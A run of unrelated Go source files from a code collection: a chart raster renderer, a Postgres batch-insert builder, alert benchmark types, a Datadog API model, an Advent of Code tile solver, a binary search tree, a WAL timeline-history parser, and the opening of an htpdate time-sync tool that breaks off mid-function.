i: i,
gc: gc,
}, nil
}
return nil, err
}
// rasterRenderer renders chart commands to a bitmap.
type rasterRenderer struct {
i *image.RGBA
gc *drawing.RasterGraphicContext
rotateRadians *float64
s Style
}
func (rr *rasterRenderer) ResetStyle() {
rr.s = Style{Font: rr.s.Font}
rr.ClearTextRotation()
}
// GetDPI returns the dpi.
func (rr *rasterRenderer) GetDPI() float64 {
return rr.gc.GetDPI()
}
// SetDPI implements the interface method.
func (rr *rasterRenderer) SetDPI(dpi float64) {
rr.gc.SetDPI(dpi)
}
// SetClassName implements the interface method. However, PNGs have no classes.
func (rr *rasterRenderer) SetClassName(_ string) {}
// SetStrokeColor implements the interface method.
func (rr *rasterRenderer) SetStrokeColor(c drawing.Color) {
rr.s.StrokeColor = c
}
// SetLineWidth implements the interface method.
func (rr *rasterRenderer) SetStrokeWidth(width float64) {
rr.s.StrokeWidth = width
}
// StrokeDashArray sets the stroke dash array.
func (rr *rasterRenderer) SetStrokeDashArray(dashArray []float64) {
rr.s.StrokeDashArray = dashArray
}
// SetFillColor implements the interface method.
func (rr *rasterRenderer) SetFillColor(c drawing.Color) {
rr.s.FillColor = c
}
// MoveTo implements the interface method.
func (rr *rasterRenderer) MoveTo(x, y int) {
rr.gc.MoveTo(float64(x), float64(y))
}
// LineTo implements the interface method.
func (rr *rasterRenderer) LineTo(x, y int) {
rr.gc.LineTo(float64(x), float64(y))
}
// QuadCurveTo implements the interface method.
func (rr *rasterRenderer) QuadCurveTo(cx, cy, x, y int) {
rr.gc.QuadCurveTo(float64(cx), float64(cy), float64(x), float64(y))
}
// ArcTo implements the interface method.
func (rr *rasterRenderer) ArcTo(cx, cy int, rx, ry, startAngle, delta float64) {
rr.gc.ArcTo(float64(cx), float64(cy), rx, ry, startAngle, delta)
}
// Close implements the interface method.
func (rr *rasterRenderer) Close() {
rr.gc.Close()
}
// Stroke implements the interface method.
func (rr *rasterRenderer) Stroke() {
rr.gc.SetStrokeColor(rr.s.StrokeColor)
rr.gc.SetLineWidth(rr.s.StrokeWidth)
rr.gc.SetLineDash(rr.s.StrokeDashArray, 0)
rr.gc.Stroke()
}
// Fill implements the interface method.
func (rr *rasterRenderer) Fill() {
rr.gc.SetFillColor(rr.s.FillColor)
rr.gc.Fill()
}
// FillStroke implements the interface method.
func (rr *rasterRenderer) FillStroke() {
rr.gc.SetFillColor(rr.s.FillColor)
rr.gc.SetStrokeColor(rr.s.StrokeColor)
rr.gc.SetLineWidth(rr.s.StrokeWidth)
rr.gc.SetLineDash(rr.s.StrokeDashArray, 0)
rr.gc.FillStroke()
}
// Circle fully draws a circle at a given point but does not apply the fill or stroke.
func (rr *rasterRenderer) Circle(radius float64, x, y int) {
xf := float64(x)
yf := float64(y)
rr.gc.MoveTo(xf-radius, yf) //9
rr.gc.QuadCurveTo(xf-radius, yf-radius, xf, yf-radius) //12
rr.gc.QuadCurveTo(xf+radius, yf-radius, xf+radius, yf) //3
rr.gc.QuadCurveTo(xf+radius, yf+radius, xf, yf+radius) //6
rr.gc.QuadCurveTo(xf-radius, yf+radius, xf-radius, yf) //9
}
// SetFont implements the interface method.
func (rr *rasterRenderer) SetFont(f *truetype.Font) {
rr.s.Font = f
}
// SetFontSize implements the interface method.
func (rr *rasterRenderer) SetFontSize(size float64) {
rr.s.FontSize = size
}
// SetFontColor implements the interface method.
func (rr *rasterRenderer) SetFontColor(c drawing.Color) {
rr.s.FontColor = c
}
// Text implements the interface method.
func (rr *rasterRenderer) Text(body string, x, y int) {
xf, yf := rr.getCoords(x, y)
rr.gc.SetFont(rr.s.Font)
rr.gc.SetFontSize(rr.s.FontSize)
rr.gc.SetFillColor(rr.s.FontColor)
rr.gc.CreateStringPath(body, float64(xf), float64(yf))
rr.gc.Fill()
}
// MeasureText returns the height and width in pixels of a string.
func (rr *rasterRenderer) MeasureText(body string) Box {
rr.gc.SetFont(rr.s.Font)
rr.gc.SetFontSize(rr.s.FontSize)
rr.gc.SetFillColor(rr.s.FontColor)
l, t, r, b, err := rr.gc.GetStringBounds(body)
if err != nil {
return Box{}
}
if l < 0 {
r = r - l // equivalent to r+(-1*l)
l = 0
}
if t < 0 {
b = b - t
t = 0
}
if l > 0 {
r = r + l
l = 0
}
if t > 0 {
b = b + t
t = 0
}
textBox := Box{
Top: int(math.Ceil(t)),
Left: int(math.Ceil(l)),
Right: int(math.Ceil(r)),
Bottom: int(math.Ceil(b)),
}
if rr.rotateRadians == nil {
return textBox
}
return textBox.Corners().Rotate(RadiansToDegrees(*rr.rotateRadians)).Box()
}
// SetTextRotation sets a text rotation.
func (rr *rasterRenderer) SetTextRotation(radians float64) {
rr.rotateRadians = &radians
}
func (rr *rasterRenderer) getCoords(x, y int) (xf, yf int) {
if rr.rotateRadians == nil {
xf = x
yf = y
return
}
rr.gc.Translate(float64(x), float64(y))
rr.gc.Rotate(*rr.rotateRadians)
return
}
// ClearTextRotation clears text rotation.
func (rr *rasterRenderer) ClearTextRotation() {
rr.gc.SetMatrixTransform(drawing.NewIdentityMatrix())
rr.rotateRadians = nil
}
// Save implements the interface method.
func (rr *rasterRenderer) Save(w io.Writer) error {
if typed, isTyped := w.(RGBACollector); isTyped {
typed.SetRGBA(rr.i)
return nil
}
return png.Encode(w, rr.i)
} | raster_renderer.go | 0.857007 | 0.420778 | raster_renderer.go | starcoder |
package db
import (
"fmt"
"sort"
sq "github.com/Masterminds/squirrel"
"github.com/paydex-core/paydex-go/support/errors"
)
// Row adds a new row to the batch. All rows must have exactly the same columns
// (map keys). Otherwise, error will be returned. Please note that rows are not
// added one by one but in batches when `Exec` is called (or `MaxBatchSize` is
// reached).
func (b *BatchInsertBuilder) Row(row map[string]interface{}) error {
if b.columns == nil {
b.columns = make([]string, 0, len(row))
b.rows = make([][]interface{}, 0)
for column := range row {
b.columns = append(b.columns, column)
}
sort.Strings(b.columns)
}
if len(b.columns) != len(row) {
return errors.Errorf("invalid number of columns (expected=%d, actual=%d)", len(b.columns), len(row))
}
rowSlice := make([]interface{}, 0, len(b.columns))
for _, column := range b.columns {
val, ok := row[column]
if !ok {
return errors.Errorf(`column "%s" does not exist`, column)
}
rowSlice = append(rowSlice, val)
}
b.rows = append(b.rows, rowSlice)
// Call Exec when MaxBatchSize is reached.
if len(b.rows) == b.MaxBatchSize {
return b.Exec()
}
return nil
}
// Exec inserts rows in batches. In case of errors it's possible that some batches
// were added so this should be run in a DB transaction for easy rollbacks.
func (b *BatchInsertBuilder) Exec() error {
b.sql = sq.Insert(b.Table.Name).Columns(b.columns...)
paramsCount := 0
for _, row := range b.rows {
b.sql = b.sql.Values(row...)
paramsCount += len(row)
if paramsCount > postgresQueryMaxParams-2*len(b.columns) {
_, err := b.Table.Session.Exec(b.sql)
if err != nil {
return errors.Wrap(err, fmt.Sprintf("error adding values while inserting to %s", b.Table.Name))
}
paramsCount = 0
b.sql = sq.Insert(b.Table.Name).Columns(b.columns...)
}
}
// Insert last batch
if paramsCount > 0 {
_, err := b.Table.Session.Exec(b.sql)
if err != nil {
return errors.Wrap(err, fmt.Sprintf("error adding values while inserting to %s", b.Table.Name))
}
}
// Clear the rows so user can reuse it for batch inserting to a single table
b.rows = make([][]interface{}, 0)
return nil
} | support/db/batch_insert_builder.go | 0.682256 | 0.411229 | batch_insert_builder.go | starcoder |
package sub
import (
"fmt"
)
type BenchmarkType uint
const (
BenchmarkTypeTypeUndefined BenchmarkType = 0
BenchmarkTypeEqual BenchmarkType = 1
BenchmarkTypeGT BenchmarkType = 2
BenchmarkTypeGTE BenchmarkType = 3
BenchmarkTypeLT BenchmarkType = 4
BenchmarkTypeLTE BenchmarkType = 5
BenchmarkTypeRange BenchmarkType = 6
BenchmarkTypeOutOfRange BenchmarkType = 7
BenchmarkTypeNoValue BenchmarkType = 8 // TODO:to be implemented
BenchmarkTypeHasValue BenchmarkType = 9 // TODO:to be implemented
)
type Condition struct {
DatasourceID int64 `json:"datasourceId"`
Script string `json:"script"`
Benchmark Benchmark `json:"benchmark"`
}
type Benchmark struct {
Type BenchmarkType `json:"type"`
SingleValue float64 `json:"singleValue"`
Range struct {
Lower float64 `json:"lower"`
Upper float64 `json:"upper"`
}
}
func (b *Benchmark) String() string {
switch b.Type {
default:
return fmt.Sprintf("unsupported benchmark:%d", b.Type)
case BenchmarkTypeEqual:
return fmt.Sprintf("!=%.2f", b.SingleValue)
case BenchmarkTypeGT:
return fmt.Sprintf("<=%.2f", b.SingleValue)
case BenchmarkTypeGTE:
return fmt.Sprintf("<%.2f", b.SingleValue)
case BenchmarkTypeLT:
return fmt.Sprintf(">=%.2f", b.SingleValue)
case BenchmarkTypeLTE:
return fmt.Sprintf(">%.2f", b.SingleValue)
case BenchmarkTypeRange:
return fmt.Sprintf("not in (%.2f,%.2f)", b.Range.Lower, b.Range.Upper)
case BenchmarkTypeOutOfRange:
return fmt.Sprintf("in (%.2f,%.2f)", b.Range.Lower, b.Range.Upper)
}
}
type ConditionResult struct {
Name string `json:"name"`
Value float64 `json:"value"`
DatasourceResult *DatasourceResult `json:"datasourceResult"`
Alerting bool `json:"alerting"`
Condition *Condition `json:"condition"`
}
func (r *ConditionResult) String() string {
if r.Alerting {
return fmt.Sprintf("%s should %s, but is %.4f", r.Name, r.Condition.Benchmark.String(), r.Value)
}
return fmt.Sprintf("%s should %s, and is %.2f", r.Name, r.Condition.Benchmark.String(), r.Value)
}
// NotValid test the benchmark result is not valid
func (b *Benchmark) NotValid(value float64) bool {
switch b.Type {
default:
return false
case BenchmarkTypeEqual:
return value == b.SingleValue
case BenchmarkTypeGT:
return value > b.SingleValue
case BenchmarkTypeGTE:
return value >= b.SingleValue
case BenchmarkTypeLT:
return value < b.SingleValue
case BenchmarkTypeLTE:
return value <= b.SingleValue
case BenchmarkTypeRange:
return value >= b.Range.Lower && value <= b.Range.Upper
case BenchmarkTypeOutOfRange:
return !(value >= b.Range.Lower && value <= b.Range.Upper)
}
} | be/ent/schema/sub/rule_condition.go | 0.505615 | 0.472379 | rule_condition.go | starcoder |
package datadog
import (
"encoding/json"
"fmt"
)
// LogsIndexesOrder Object containing the ordered list of log index names.
type LogsIndexesOrder struct {
// Array of strings identifying by their name(s) the index(es) of your organization. Logs are tested against the query filter of each index one by one, following the order of the array. Logs are eventually stored in the first matching index.
IndexNames []string `json:"index_names"`
// UnparsedObject contains the raw value of the object if there was an error when deserializing into the struct
UnparsedObject map[string]interface{} `json:-`
}
// NewLogsIndexesOrder instantiates a new LogsIndexesOrder object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
func NewLogsIndexesOrder(indexNames []string) *LogsIndexesOrder {
this := LogsIndexesOrder{}
this.IndexNames = indexNames
return &this
}
// NewLogsIndexesOrderWithDefaults instantiates a new LogsIndexesOrder object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
func NewLogsIndexesOrderWithDefaults() *LogsIndexesOrder {
this := LogsIndexesOrder{}
return &this
}
// GetIndexNames returns the IndexNames field value
func (o *LogsIndexesOrder) GetIndexNames() []string {
if o == nil {
var ret []string
return ret
}
return o.IndexNames
}
// GetIndexNamesOk returns a tuple with the IndexNames field value
// and a boolean to check if the value has been set.
func (o *LogsIndexesOrder) GetIndexNamesOk() (*[]string, bool) {
if o == nil {
return nil, false
}
return &o.IndexNames, true
}
// SetIndexNames sets field value
func (o *LogsIndexesOrder) SetIndexNames(v []string) {
o.IndexNames = v
}
func (o LogsIndexesOrder) MarshalJSON() ([]byte, error) {
toSerialize := map[string]interface{}{}
if o.UnparsedObject != nil {
return json.Marshal(o.UnparsedObject)
}
if true {
toSerialize["index_names"] = o.IndexNames
}
return json.Marshal(toSerialize)
}
func (o *LogsIndexesOrder) UnmarshalJSON(bytes []byte) (err error) {
raw := map[string]interface{}{}
required := struct {
IndexNames *[]string `json:"index_names"`
}{}
all := struct {
IndexNames []string `json:"index_names"`
}{}
err = json.Unmarshal(bytes, &required)
if err != nil {
return err
}
if required.IndexNames == nil {
return fmt.Errorf("Required field index_names missing")
}
err = json.Unmarshal(bytes, &all)
if err != nil {
err = json.Unmarshal(bytes, &raw)
if err != nil {
return err
}
o.UnparsedObject = raw
return nil
}
o.IndexNames = all.IndexNames
return nil
}
type NullableLogsIndexesOrder struct {
value *LogsIndexesOrder
isSet bool
}
func (v NullableLogsIndexesOrder) Get() *LogsIndexesOrder {
return v.value
}
func (v *NullableLogsIndexesOrder) Set(val *LogsIndexesOrder) {
v.value = val
v.isSet = true
}
func (v NullableLogsIndexesOrder) IsSet() bool {
return v.isSet
}
func (v *NullableLogsIndexesOrder) Unset() {
v.value = nil
v.isSet = false
}
func NewNullableLogsIndexesOrder(val *LogsIndexesOrder) *NullableLogsIndexesOrder {
return &NullableLogsIndexesOrder{value: val, isSet: true}
}
func (v NullableLogsIndexesOrder) MarshalJSON() ([]byte, error) {
return json.Marshal(v.value)
}
func (v *NullableLogsIndexesOrder) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
} | api/v1/datadog/model_logs_indexes_order.go | 0.615435 | 0.435781 | model_logs_indexes_order.go | starcoder |
package tile
import (
"fmt"
"io"
"log"
"strconv"
"strings"
"github.com/cshabsin/advent/common/readinp"
)
// Map is the structure of a set of tiles.
type Map struct {
tiles map[int]*Tile
edgeMap map[int][]int
}
// Rotate rotates the given tile n times counterclockwise.
func (tm *Map) Rotate(tileNum, rotate int) {
tm.tiles[tileNum].Rotate(rotate)
}
// GetTile returns the numbered tile.
func (tm Map) GetTile(tileNum int) *Tile {
return tm.tiles[tileNum]
}
// ReadFile reads an input file and produces a tile Map.
func ReadFile(filename string) (*Map, error) {
ch, err := readinp.Read(filename)
if err != nil {
return nil, err
}
tiles := &Map{tiles: map[int]*Tile{}, edgeMap: map[int][]int{}}
for {
nextTile, err := Read(ch)
if err == io.EOF {
break
}
if err != nil {
return nil, err
}
tid := nextTile.ID()
tiles.tiles[tid] = nextTile
if err == io.EOF {
break
} else if err != nil {
return nil, err
}
for i := 0; i < 4; i++ {
edge := nextTile.ReadEdge(i)
tiles.edgeMap[edge] = append(tiles.edgeMap[edge], tid)
tiles.edgeMap[EdgeDual(edge)] = append(tiles.edgeMap[EdgeDual(edge)], tid)
}
_, err = ReadLine(ch) // skip blank line
if err != nil {
return nil, err
}
}
for _, tile := range tiles.tiles {
for i := 0; i < 4; i++ {
tile.SetNeighborFromEdgeMap(tiles.edgeMap)
}
}
return tiles, nil
}
// Tile is a tile from day 20 of advent of code 2020.
type Tile struct {
id int
allVals [][]bool
rotation int
flipped bool
neighbors []int // same indeces as edges, 0 for none
numNeighbors int
}
// Read reads a tile from the given readinp channel and returns it.
func Read(ch chan readinp.Line) (*Tile, error) {
var lines []string
for i := 0; i < 11; i++ {
line, err := ReadLine(ch)
if err != nil {
return nil, err
}
lines = append(lines, line)
}
return ParseLines(lines)
}
// ParseLines parses a number of lines to produce a single tile.
func ParseLines(lines []string) (*Tile, error) {
tid, err := strconv.Atoi(strings.TrimSuffix(strings.TrimPrefix(lines[0], "Tile "), ":"))
if err != nil {
return nil, err
}
allVals := make([][]bool, 10)
for i := 0; i < 10; i++ {
if err != nil {
log.Fatal(err)
}
allValLine := make([]bool, 10)
for j, c := range lines[i+1] {
allValLine[j] = c == '#'
}
allVals[i] = allValLine
}
return &Tile{
id: tid,
allVals: allVals,
}, nil
}
// ID returns the ID of the tile.
func (t Tile) ID() int {
return t.id
}
// ReadEdge reads the binary value of the bits on the given edge.
// edges are: 0(top), 1(left), 2(bottom), 3(right)
func (t Tile) ReadEdge(e int) int {
switch e {
case 0: // top
total := 0
for j := 0; j < 10; j++ {
total *= 2
if t.getRaw(0, j) {
total++
}
}
return total
case 1: // left
total := 0
for j := 0; j < 10; j++ {
total *= 2
if t.getRaw(j, 0) {
total++
}
}
return total
case 2: // bottom
total := 0
for j := 0; j < 10; j++ {
total *= 2
if t.getRaw(9, j) {
total++
}
}
return total
case 3: // right
total := 0
for j := 0; j < 10; j++ {
total *= 2
if t.getRaw(j, 9) {
total++
}
}
return total
default:
log.Fatal("bad e", e)
return -1
}
}
func (t Tile) getRaw(y, x int) bool {
switch t.rotation % 4 {
case 1:
x, y = 9-y, x
case 2:
x, y = 9-x, 9-y
case 3:
x, y = y, 9-x
}
if t.flipped {
x = 9 - x
}
return t.allVals[y][x]
}
// Get tells whether the given pixel is set, based on the contents of the tile and its rotation state.
func (t Tile) Get(y, x int) bool {
return t.getRaw(y+1, x+1)
}
// Rotate rotates the tile counterclockwise n times.
func (t *Tile) Rotate(n int) {
t.rotation = (t.rotation + n) % 4
}
// Flip flips the tile across y axis.
func (t *Tile) Flip() {
t.flipped = !t.flipped
}
// EdgeMatches determines whether the edge matches the given value.
func (t Tile) EdgeMatches(e, val int) bool {
if t.ReadEdge(e) == val {
return true
}
return false
}
// MatchEdge flips and rotates the tile until the given value is on the given edge.
func (t *Tile) MatchEdge(e, val int) {
for j := 0; j < 2; j++ {
for i := 0; i < 4; i++ {
if t.ReadEdge(e) == val {
return
}
t.Rotate(1)
}
t.Flip()
}
log.Fatalf("no match for %d on edge %d in tile:\n%v", val, e, *t)
}
// SetNeighborFromEdgeMap sets the neighbors from a collected map of edge value to matching tiles.
func (t *Tile) SetNeighborFromEdgeMap(edgeMap map[int][]int) {
neighborCount := 0
t.neighbors = make([]int, 4)
for i := 0; i < 4; i++ {
edge := t.ReadEdge(i)
edgeMatches := edgeMap[edge]
if len(edgeMatches) == 1 {
continue // no neighbor in that direction
}
for _, neighbor := range edgeMatches {
if neighbor != t.id {
neighborCount++
t.neighbors[i] = neighbor
break
}
}
}
t.numNeighbors = neighborCount
}
// NumNeighbors returns the number of matched neighbors.
func (t Tile) NumNeighbors() int {
return t.numNeighbors
}
// GetNeighbor returns the neighbor number on the given edge, after rotation/flip (0 if none)
func (t Tile) GetNeighbor(e int) int {
if t.neighbors == nil {
return -1
}
e = (e - t.rotation + 4) % 4
if t.flipped {
if e == 1 {
e = 3
} else if e == 3 {
e = 1
}
}
return t.neighbors[e]
}
// HasNeighbor returns whether there is a
func (t Tile) HasNeighbor(e int) bool {
return t.GetNeighbor(e) != 0
}
func (t Tile) String() string {
leftEdge := strconv.Itoa(t.ReadEdge(1))
leftDual := fmt.Sprintf("(%d)", EdgeDual(t.ReadEdge(1)))
spacer := " " + strconv.Itoa(t.rotation)
for len(leftEdge) < len(leftDual) {
leftEdge += " "
}
for range leftDual {
spacer += " "
}
var b strings.Builder
b.WriteString(fmt.Sprintf("%d%s%d (%d) ^ %d\n", t.id, spacer, t.ReadEdge(0), EdgeDual(t.ReadEdge(0)), t.GetNeighbor(0)))
for y := 0; y < 8; y++ {
if y == 3 {
b.WriteString(leftEdge + " ")
} else if y == 4 {
b.WriteString(leftDual + " ")
} else {
b.WriteString(spacer)
}
for x := 0; x < 8; x++ {
if t.Get(y, x) {
b.WriteString("X ")
} else {
b.WriteString(". ")
}
}
if y == 3 {
b.WriteString(" " + strconv.Itoa(t.ReadEdge(3)))
} else if y == 4 {
b.WriteString(fmt.Sprintf(" (%d)", EdgeDual(t.ReadEdge(3))))
}
b.WriteString("\n")
}
b.WriteString(fmt.Sprintf("<- %d %d (%d) v %d -> %d\n", t.GetNeighbor(1), t.ReadEdge(2), EdgeDual(t.ReadEdge(2)), t.GetNeighbor(2), t.GetNeighbor(3)))
return b.String()
}
// EdgeDual returns the "dual" of a given edge value (i.e. its value with bits read in the other direction).
func EdgeDual(a int) int {
var b int
for i := 0; i < 10; i++ {
b = b*2 + (a >> i & 1)
}
return b
}
// ReadLine reads a single line from the given channel and trims it.
// Returns EOF error on eof, or any other errors.
func ReadLine(ch chan readinp.Line) (string, error) {
line, ok := <-ch
if !ok {
return "", io.EOF
}
if line.Error != nil {
return "", line.Error
}
return strings.TrimSpace(*line.Contents), nil
} | 2020/tile/tile.go | 0.708313 | 0.438966 | tile.go | starcoder |
package rbt
type BinaryTree struct {
Root *BinaryTreeNode
}
func NewBinaryTree() *BinaryTree {
return &BinaryTree{}
}
func (t *BinaryTree) Insert(key Comparable, v interface{}) (ret bool) {
ret = true
node := NewBinaryTreeNode(key, v)
cur := t.Root
if cur == nil {
t.Root = node
return
}
var parent *BinaryTreeNode // 记录父亲节点
var cmpResult CmpResult // 记录每次比较结果
for cur != nil {
parent = cur
cmpResult = key.Cmp(cur.Key)
switch cmpResult {
case CMP_EQ:
return false
case CMP_LESS:
cur = cur.Right
case CMP_MORE:
cur = cur.Left
}
}
if cmpResult == CMP_MORE {
parent.SetLeftChild(node)
} else {
parent.SetRightChild(node)
}
return
}
// learn from https://www.bilibili.com/video/BV17P4y1h74 0:54:22
func (t *BinaryTree) Remove(v Comparable) (ret bool) {
ret = true
cur := t.Find(v)
if cur == nil {
return false
}
// case 1: left and right are null
if cur.Left == nil && cur.Right == nil {
isRoot := cur.Parent == nil
if isRoot {
t.Root = nil
} else {
parent := cur.Parent
// cur is the left child of parent
if cur == parent.Left {
parent.Left = nil
} else {
parent.Right = nil
}
}
cur.Clear()
return
}
// case 2: one of the children is null , and the other is not null
if (cur.Left == nil && cur.Right != nil) || (cur.Left != nil && cur.Right == nil) {
t.RemoveCaseTwo_b(cur)
return
}
// case 3:
t.RemoveCaseThree(cur)
return
}
// 第二种场景,其中一个子节点是空,另外一个非空
// 第一种方法,直接用 candidateNode 执行节点替换 cur, 需要考虑 cur 是否是根节点 以及 cur是左节点还是右节点
func (t *BinaryTree) RemoveCaseTwo_a(cur *BinaryTreeNode) {
isRoot := cur.Parent == nil
var candidateNode *BinaryTreeNode
if cur.Left != nil {
candidateNode = cur.Left
}
if cur.Right != nil {
candidateNode = cur.Right
}
if isRoot {
t.Root = candidateNode
candidateNode.Parent = nil
} else {
parent := cur.Parent
candidateNode.Parent = parent
if cur == parent.Left {
parent.Left = candidateNode
} else {
parent.Right = candidateNode
}
}
cur.Clear()
}
// 第二种场景,其中一个子节点是空,另外一个非空
// 第二种方法, 把 candidateNode 的Key、Value、Left、Right 复制给 cur
// cur的左右节点分别指向 candidateNode的左右节点,candidateNode的左右节点的父亲节点指向 cur
// 最后只需要删除 candidateNode 就可以
func (t *BinaryTree) RemoveCaseTwo_b(cur *BinaryTreeNode) {
var candidateNode *BinaryTreeNode
if cur.Left != nil {
candidateNode = cur.Left
}
if cur.Right != nil {
candidateNode = cur.Right
}
cur.CloneValue(candidateNode)
cur.SetLeftChild(candidateNode.Left)
cur.SetRightChild(candidateNode.Right)
cur.Clear()
}
// 第三种场景,两个节点都是非空节点
// right := cur.Right
// 记录
// 3.1 if right.Left is null,just give right 's key and value to cur, let right.Right as cur's Right child
// and then just clean right
// 3.1 如果 right.Left is null, 只需要把 right的 key、Value复制给 cur, 然后让 right.Right作为 cur 的右子节点
// 最后只需要清除 right 就可以了
// 3.2 if right.Left is not null, get the most left node of right , we name it leftMost. just give leftMost 's key and value to cur,
// and let leftMost's Right node as leftMost'Parent 's Left node, and then clean leftMost
// 3.2 如果 right.Left 非空,获取right出发最左边的节点,命名为leftMost. 然后把leftMost节点的key、value复制给cur,
// 然后把leftMost的右子节点作为leftMost父节点的左节点,最后清除leftMost
func (t *BinaryTree) RemoveCaseThree(cur *BinaryTreeNode) {
right := cur.Right
// case: 3.1
if right.Left == nil {
cur.CloneValue(right)
cur.SetRightChild(right.Right)
right.Clear()
return
}
// case:3.2
leftMost := t.FindMostLeft(right)
cur.CloneValue(leftMost)
parent := leftMost.Parent
parent.SetLeftChild(leftMost.Right)
leftMost.Clear()
}
func (t *BinaryTree) Find(v Comparable) *BinaryTreeNode {
cur := t.Root
for cur != nil {
switch v.Cmp(cur.Key) {
case CMP_EQ:
return cur
case CMP_LESS:
cur = cur.Right
case CMP_MORE:
cur = cur.Left
}
}
return nil
}
// 查找节点 cur 左子树中最左边的节点,也就是最小节点
func (t *BinaryTree) FindMostLeft(cur *BinaryTreeNode) *BinaryTreeNode {
for cur.Left != nil {
cur = cur.Left
}
return cur
}
// 查找节点 cur 右子树中最右边的节点,也就是最大节点
func (t *BinaryTree) FindMostRight(cur *BinaryTreeNode) *BinaryTreeNode {
for cur.Right != nil {
cur = cur.Right
}
return cur
} | binary_tree.go | 0.569134 | 0.458227 | binary_tree.go | starcoder |
package internal
/*
This module can represent a Timeline History file which can be retrieved from Postgres using the TIMELINEHISTORY SQL command.
A Timeline History file belongs to a timeline (which also will be the last Row in the file), and contains multiple rows.
Each row describes at what LSN that timeline came to be.
Example history file:
1 0/2A33FF50 no recovery target specified
2 0/2A3400E8 no recovery target specified
By storing the Timeline History file in this object, it can easilly be searched for the timeline that a specific LSN belongs too.
Furthermore it can be read as an IOReader (having a Name() and Read() function) to easilly writeout by the WalUploader.
*/
import (
"io"
"regexp"
"sort"
"strconv"
"strings"
"github.com/jackc/pglogrepl"
)
// The TimeLineHistFileRow struct represents one line in the TimeLineHistory file
type TimeLineHistFileRow struct {
TimeLineID uint32
StartLSN pglogrepl.LSN
Comment string
}
// The TimeLineHistFile struct represents a TimeLineHistory file containing TimeLineHistFileRows.
// Since TimeLineHistFileRows are only parsed 0 or 1 rimes, the data is only
// preserved as []byte and parsed to TimeLineHistFileRows when required.
type TimeLineHistFile struct {
TimeLineID uint32
Filename string
data []byte
readIndex int
}
//NewTimeLineHistFile is a helper function to define a new TimeLineHistFile
func NewTimeLineHistFile(timelineid uint32, filename string, body []byte) (TimeLineHistFile, error) {
tlh := TimeLineHistFile{TimeLineID: timelineid, Filename: filename, data: body}
return tlh, nil
}
// rows parses the data ([]byte) from a TimeLineHistFile and returns the TimeLineHistFileRows that are contained.
func (tlh TimeLineHistFile) rows() ([]TimeLineHistFileRow, error) {
var rows []TimeLineHistFileRow
r := regexp.MustCompile("[^\\s]+")
for _, row := range strings.Split(string(tlh.data), "\n") {
// Remove comments and split by one or more whitespace characters
// FindAllStrings removes front spaces, and returns up to 3 cols.
cols := r.FindAllString(strings.Split(row, "#")[0], 3)
if len(cols) >= 2 {
tlhr := TimeLineHistFileRow{}
tlid, err := strconv.Atoi(cols[0])
if err != nil {
return rows, err
}
tlhr.TimeLineID = uint32(tlid)
tlhr.StartLSN, err = pglogrepl.ParseLSN(cols[1])
if err != nil {
return rows, err
}
if len(cols) > 2 {
tlhr.Comment = cols[2]
}
rows = append(rows, tlhr)
}
}
return rows, nil
}
// LSNToTimeLine uses rows() to get all TimeLineHistFileRows and from those rows get the timeline that a LS belongs too.
func (tlh TimeLineHistFile) LSNToTimeLine(lsn pglogrepl.LSN) (uint32, error) {
rows, err := tlh.rows()
if err != nil {
return 0, err
}
// Sorting makes LSNToTimeLine more efficient
sort.Slice(rows, func(i, j int) bool {
return rows[i].TimeLineID < rows[j].TimeLineID
})
for _, row := range rows {
if lsn < row.StartLSN {
return row.TimeLineID, nil
}
}
return tlh.TimeLineID, nil
}
// Name returns the filename of this wal segment. This is a convenience function used by the WalUploader.
func (tlh TimeLineHistFile) Name() string {
return tlh.Filename
}
// Read is what makes the WalSegment an io.Reader, which can be handled by WalUploader.UploadWalFile.
func (tlh TimeLineHistFile) Read(p []byte) (n int, err error) {
n = copy(p, tlh.data[tlh.readIndex:])
tlh.readIndex += n
if len(tlh.data) <= tlh.readIndex {
return n, io.EOF
}
return n, nil
} | internal/timeline_history.go | 0.735547 | 0.446676 | timeline_history.go | starcoder |
package main
import (
"fmt"
"log"
"net/http"
"os"
"os/exec"
"strings"
"time"
"github.com/leekchan/timeutil"
"gopkg.in/alecthomas/kingpin.v2"
)
var (
serversArg = kingpin.Flag("server", "server to use for synchronization, multiple values possible").Short('s').Default("pool.ntp.org", "ntp.org").URLList()
debugFlag = kingpin.Flag("debug", "turn debug on").Short('d').Default("false").Bool()
commandToSetDate = kingpin.Arg("command", `command to set the date. You can use following directives to format the date:
%a Weekday as locale’s abbreviated name. (Sun, Mon, ..., Sat)
%A Weekday as locale’s full name. (Sunday, Monday, ..., Saturday)
%w Weekday as a decimal number, where 0 is Sunday and 6 is Saturday (0, 1, ..., 6)
%d Day of the month as a zero-padded decimal number. (01, 02, ..., 31)
%b Month as locale’s abbreviated name. (Jan, Feb, ..., Dec)
%B Month as locale’s full name. (January, February, ..., December)
%m Month as a zero-padded decimal number. (01, 02, ..., 12)
%y Year without century as a zero-padded decimal number. (00, 01, ..., 99)
%Y Year with century as a decimal number. (1970, 1988, 2001, 2013)
%H Hour (24-hour clock) as a zero-padded decimal number. (00, 01, ..., 23)
%I Hour (12-hour clock) as a zero-padded decimal number. (01, 02, ..., 12)
%p Meridian indicator. (AM, PM)
%M Minute as a zero-padded decimal number. (00, 01, ..., 59)
%S Second as a zero-padded decimal number. (00, 01, ..., 59)
%f Microsecond as a decimal number, zero-padded on the left. (000000, 000001, ..., 999999)
%z UTC offset in the form +HHMM or -HHMM (+0000)
%Z Time zone name (UTC)
%j Day of the year as a zero-padded decimal number (001, 002, ..., 366)
%U Week number of the year (Sunday as the first day of the week) as a zero padded decimal number. All days in a new year preceding the first Sunday are considered to be in week 0.
(00, 01, ..., 53)
%W Week number of the year (Monday as the first day of the week) as a decimal number. All days in a new year preceding the first Monday are considered to be in week 0.
(00, 01, ..., 53)
%c Date and time representation. (Tue Aug 16 21:30:00 1988)
%x Date representation. (08/16/88)
%X Time representation. (21:30:00)
%% A literal '%' character. (%)
Example:
htpdate --server pool.ntp.org --server ntp.org -- date --set="%a, %d %b %Y %H:%M:%S %Z"
If not specified htpdate tries to set the date by itself
`).Strings()
)
func main() {
kingpin.Version("1.0")
kingpin.Parse()
logDebug := func(s string, v ...interface{}) {
log.Printf(s, v...)
}
if !*debugFlag {
logDebug = func(s string, v ...interface{}) {}
}
if len(*serversArg) <= 0 {
fmt.Fprintf(os.Stderr, "No servers to synchronization\n")
